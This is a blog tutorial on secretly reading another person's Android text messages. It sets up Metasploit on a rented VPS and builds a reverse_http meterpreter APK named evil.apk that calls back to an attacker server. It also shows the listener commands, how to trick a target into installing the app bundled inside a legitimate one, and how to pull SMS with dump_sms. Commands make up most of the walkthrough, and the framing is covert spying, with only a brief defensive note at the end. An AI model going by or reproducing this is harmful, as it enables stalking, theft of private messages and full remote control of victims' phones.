How to Monitor Text Messages on Android (Secretly)

Secretly Monitor Text Messages on Android ojoiszy.com

Is it possible to monitor someone’s text messages on Android without having their phones? The answer is a concrete yes! And this tutorial shows how to do that using the Metasploit Framework.

Android phones have zero device-level security or encryption. This means that data stored on the Android system can be accessed by apps or other methods very easily in readable formats. Anyone can essentially make an app that can send and receive data out it and be able to read it in cleartext.

And also because Android is open-sourced, it’s not too difficult for attackers to make these malicious apps that can hook into the Android system to retrieve information the attacker cares about.

What You’ll Need

I am going to be demonstrating how easy it is to monitor the text messages on my Android phone in this tutorial over the internet or wide area network (WAN).

This would be unlike the other tutorials on this same topic that are done over a local area network (LAN). Thus, you are going to be needing the following:

  • A VPS server. You can rent a cheap VPS from Digital Ocean for $10 using this link.
  • Metasploit-Framework Installed. On the VPS, install the latest version of Metasploit.
  • An Android phone. This is going to serve as our target we are remotely monitoring their text messages.

Monitor Text Messages on Someone’s Phone Without Them Knowing

You can follow the rest of this written guide, or click this video below if you want to watch a live demo of me spying or monitoring text messages on my own Android phone.

Step 1: Acquire & Connect to the Attack VPS Server

There are very few VSP services out there that allow penetration testing or hacking activities to be done from their servers and Digital Ocean is one of them.

So head over to Digital Ocean website and create an account. When you’re signed in, create a new droplet. Droplet is what Digital Ocean calls their VPS instances.

Create New Droplet on Digital Ocean

Choose an image or distribution to install. Since Metasploit is a Debian based project we would select the latest version of Debian.

Choose Debian Image Create New Droplet

Next, you want to select a plan. The basic $10 plan which gives 2GB of RAM and 1CPU core would suffice for running this test.

Select a Plan Create New Droplet

Select a datacenter region. Generally, the closer the datacenter region to the target the better.

Choose VSP Datacenter Create New Droplet

Set a password for authenticating to the VPS droplet. It’s recommended to use SSH Keys for a more secure auth but we will use a password to keep things simple.

Set VPS Authentication Create New Droplet

Finally, click “Create Droplet” to spin up the server. The process is pretty fast and in a moment you’ll be presented with the IP address of your new server.

Now to connect to the server, Linux and Mac users can fire up a terminal window and type in the following command.

[email protected]<the VPS IP address>

It would prompt for the password you set during creation.

But if you’re running a Windows PC, you are going to need to install a program to communicate to the server. And Putty SSH client is the best recommendation.

Head over to their official website to download the latest version of Putty and install it. The installation is a breeze and in a moment you’re up and running.

Now to connect with Putty to your VPS server, type in the IP address of the server in the Hostname field and click open.

Connect to VPS server with Putty SSH client

The username is root and the password is the one you set during the VPS creation.

Step 2: Install Metasploit FrameWork

After you log in to the VPS server you are going to install the Metasploit Framework which is our tool of attack.

But before that let’s upgrade and update the server so that things run smoothly.

apt update && apt upgrade -y

Next, run the below command to install some dependencies.

apt install curl gnupg gnupg1 gnupg2 -y

Afterwhich run this long multi-line command to install the Metasploit package.

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

After the installation completes, drop super user (root) priviledges by creating a standard user.

This is so that we can start msfconsole as a standard user which will allow us to answer the setup questions to create the Metasploit database. Creating a database makes searching through modules much faster and also adds other perks.

adduser <give your preferred username here>
Create Standard VPS User

Drop from root.

su <your username goes here>

Now run msfconsole to setup the MSF database.

Drop From Root Run msfconsole to Start Metasploit

Press enter on all the questions to accept and soon you’ll end up with a screen familiar to mine below when Mestasploit is started.

MSF Console

You can confirm the database is connected by typing db_status within Metasploit

Check Status of MSF Database Connection

Step 3: Setup the Attack

With all that prep out of the way let’s get into the fun part where we setup the attack for our first target.

So there are two things we need to do.

First, we will create the payload which the target will install to penetrate their Android phone, then we’ll set up the listener or command & control (C2) server to receive the callback connection from the phone.

To create the payload type in the following command. This will generate an APK file or Android app of about 10KB that will hook the target Android phone when installed.

msfvenom -p android/meterpreter/reverse_http LHOST=10.0.0.1 LPORT=8080 > evil.apk

Where:

  • msfvenom is the payload generation tool within the Metasploit Framework
  • -p indicates the type of payload
  • android/meterpreter/reverse_http is the reverse meterpreter shell that will connect the Android phone back to our listener or command & control server (C2)
  • LHOST is the IP address of your VPS server
  • LPORT is the listening port
  • > evil.apk will package/build all of that malicious code into an APK file (or Android App) which in this case we are have named ‘evil’
msfvenom Payload Creation

To set up the listener, type in the following commands. It’s important to note here that for this to work, both LHOST & LPORT should be the same as that of the payload.

use multi/handler
set PAYLOAD /android/meterpreter/reverse_http
set LHOST 10.0.0.1
set LPORT 8080
set exitonsession false
exploit -j
Meterpreter Listener Setup

Step 4: Deliver the Payload

Ok what is left is how to deliver the payload to the target Android device. And there are not too many ways an attacker could go about this than to use social enginnering techniques.

So one way to do this is by binding this malicious APK file or App into another Android App that is legitimate and then social engineer the target to install in on their phones.

Once they install it, their Android phone becomes backdoored to our Metasploit C2 server from where we can issue commands to the device.

But for the purposes of this tutorial, we are just going to access the attacker machine and download the APK payload on the Android device directly.

So we will create a quick server to enable downloading the payload using the below command.

python -m SimpleHTTPServer
Start SimpleHTTPServer to Download Payload

Now enter the IP address of the server and the default port 8000 on a browser to access the payload.

(Don’t forget to press ctrl + c to kill the Simple HTTP server after downloading the payload)

Access Metasploit C2 Sever and Download Payload With Browser

After downloading, find the app from the file manager and install it. Launch the app and you will see all the permissions the app is requesting to run with, which is ALL permissions an Android app could request for.

Install Backdoor App With ALL Permissions on Android

Once the user runs the app, a meterpreter session or connection should be established back to our attacker machine or C2 server.

Meterpreter Session Opened on C2 Server

Step 5: Dump Text Messages of Target Android Phone

Finally, it’s time to monitor the text messages on the target Android phones. I say phones because as many Android devices that install and run our little backdoor app will become zombies to our online Metasploit C2 server.

So to control a particular session or device, type in the following command to interact with that session.

sessions -i <session id number>

Once you’re in a meterpreter session, you can type help to see a list of all commands you can put in the session to control the target Android device.

Interact With meterpreter Sessions

You can see File System Commands for navigating around to where sensitive information or data are on the Android device. And at this point, you can easily download or upload any information or data.

There is a lot you can do with the backdoor on this Android device but our focus for this post is to monitor the text messages.

Now let’s extract every SMS text messages that have been sent back and forth with this Android device by entering the command dump_sms.

Extract SMS Text Messages from Android Device

This will save the extracted SMS in our local directory on the VPS server. We can cat out the file to see the content or download it from the server for closer scrutiny.

View Extracted SMS Text Messages from Android Phone

Now cross-check the extracted SMS text message with the one from my Android phone which I hacked.

Cross check Extracted SMS Text Message on Android Phone

You can check for new text messages on the Andriod device by running the dump_sms command again. And if there are new SMS received on the device, they’ll be extracted and the list updated.

Conclusion

That is how easy it is to spy on SMS text messages on Android devices. To prevent these kind of attacks from happening to you, you should always be wary of installing applications that are not from the Play Store.

If you must install apps from outside the Play Store make sure you check what permissions you’re granting the app to run with. And if an app is requesting too many permissions than it’s necessary to run, you should uninstall or not install it at all.

Hope you enjoyed this tutorial, keep coming back for more hacking tutorials like this. If you have a question, you can ask me in the comments section below. And feel free to reach out to me @ojoiszy on Twitter and Instagram if you have tutorials you’ll love to see.

5 1 vote
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
0
Would love your thoughts, please comment.x
()
x
Scroll to Top